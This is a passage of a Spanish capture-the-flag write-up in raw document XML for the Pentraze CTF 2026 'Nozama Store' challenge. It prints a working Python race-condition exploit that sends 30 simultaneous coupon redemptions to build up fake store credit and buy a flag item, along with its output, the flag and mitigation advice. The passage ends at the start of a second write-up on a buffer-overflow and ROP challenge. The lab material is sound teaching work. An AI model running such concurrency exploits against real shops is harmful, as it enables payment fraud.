          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CUPON = "ROOTKITTY10"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PRECIO = 1000</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s = requests.Session()</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def post(ruta, datos=None):</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if datos is None:</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return s.post(BASE + ruta, timeout=15)</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return s.post(BASE + ruta, json=datos, timeout=15)</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 Inicializar sesión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s.get(BASE + "/api/state", timeout=10)</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 Registrar usuario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>usuario = "kitty" + uuid.uuid4().hex[:8]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>password = "KittyCTF2026"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>email = usuario + "@example.com"</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r = post("/api/signup", {</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"user": usuario,</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"pass": password,</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"email": email,</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"name": usuario,</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"uni": "CTF"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>})</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print("REGISTRO:", r.status_code, r.text)</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if r.status_code not in (200, 201):</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raise SystemExit("Registro rechazado")</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 Confirmar autenticación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>me = s.get(BASE + "/api/me", timeout=10).json()</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if not me.get("user"):</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login = post("/api/signin", {</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"user": usuario,</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"pass": password</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me = s.get(BASE + "/api/me", timeout=10).json()</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if not me.get("user"):</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raise SystemExit("Sin sesión autenticada")</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 Compartir la sesión PHP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cookies = s.cookies.get_dict()</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def canjear(i):</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try:</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 = requests.post(</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BASE + "/api/apply-coupon",</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json={"code": CUPON},</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cookies=cookies,</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timeout=15</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return r.status_code</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except requests.RequestException:</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return 0</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 Ejecutar 30 solicitudes simultáneas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>with ThreadPoolExecutor(max_workers=30) as pool:</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resultados = list(pool.map(canjear, range(30)))</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print("Canjes exitosos:", resultados.count(200))</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 Verificar saldo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>estado = s.get(BASE + "/api/state", timeout=10).json()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>saldo = estado.get("balance", 0)</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print("SALDO:", saldo)</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if saldo &lt; PRECIO:</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raise SystemExit("Saldo insuficiente")</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 Añadir el producto protegido</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>r = post("/api/add", {</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"item": "flag-ticket",</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"qty": 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>})</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print("CARRITO:", r.status_code, r.text)</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if not r.ok:</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raise SystemExit("No se pudo agregar el producto")</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 Realizar compra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>r = post("/api/checkout")</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print("CHECKOUT:", r.status_code, r.text)</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resultado = r.json()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flag = resultado.get("order", {}).get("flag")</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if flag:</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print("FLAG:", flag)</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7. Resultados obtenidos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La explotación final se ejecutó correctamente con una cuenta autenticada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=== REGISTRO ===</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP: 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>USUARIO AUTENTICADO: kitty752406ad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cookie de sesión: OK</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 RACE CONDITION ===</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Canjes HTTP 200: 30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SALDO: 1500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CREDITOS: 30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CUPON UTILIZADO: True</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 AGREGAR FLAG AL CARRITO ===</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP: 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=== CHECKOUT ===</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP: 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Los 30 canjes fueron aceptados, acumulando US$1,500.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La respuesta del checkout confirmó una orden pagada:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</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"order": {</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"id": "ord_c59fc298727a",</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"total": 1000,</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"items": {</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"flag-ticket": 1</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"status": "paid",</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"summary": {</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"subtotal": 1000,</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"discount": 1000,</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"total": 0,</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"credits_used": 20</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"balance": 500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La respuesta también incluía el campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>order.flag</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, que contenía la flag del desafío.</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8. Flag obtenida</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PENTRAZE{93c7ef9152ae9566480f459eeeacec61241f5828e334a5e59082e332e0e858fa}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Resultado: desafío completado — 100 puntos.</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9. Impacto y mitigación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La vulnerabilidad permite que un usuario acumule crédito promocional por encima del límite previsto, comprometiendo la lógica económica de la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>En un comercio electrónico real, una debilidad semejante podría permitir compras sin abonar el importe correspondiente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Para prevenirla, se recomienda:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Aplicar el cupón y actualizar su estado mediante una operación atómica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Utilizar transacciones de base de datos con mecanismos adecuados de bloqueo o concurrencia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Implementar restricciones de unicidad sobre los canjes aplicables a cada usuario o sesión.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Calcular y verificar el saldo exclusivamente en el backend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Incorporar pruebas automatizadas con solicitudes concurrentes.</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10. Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El desafío </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Nozama Store</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> demostró cómo un control de negocio aparentemente correcto puede fallar cuando varias solicitudes se procesan simultáneamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Aunque el servidor impedía reutilizar secuencialmente el cupón </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ROOTKITTY10</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, fue posible canjearlo repetidamente mediante solicitudes concurrentes, acumular US$1,500 y comprar la Entrada Final de US$1,000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La técnica principal fue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Race Condition</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, aprovechando una debilidad en la gestión concurrente del estado de los cupones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>PENTRAZE CTF 2026 | Nozama Store | Solved by je7remy</w:t>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Heading1"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="200"/>
        <w:jc w:val="start"/>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Write-up — SMBiablo | Pentraze CTF 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Reto resuelto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Categoría: PWN Autor del reto: Br0nco Dificultad: No especificada Técnicas: Ingeniería inversa, Stack Buffer Overflow, Information Leak, ROP y ret2libc Herramientas: Fedora Linux, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
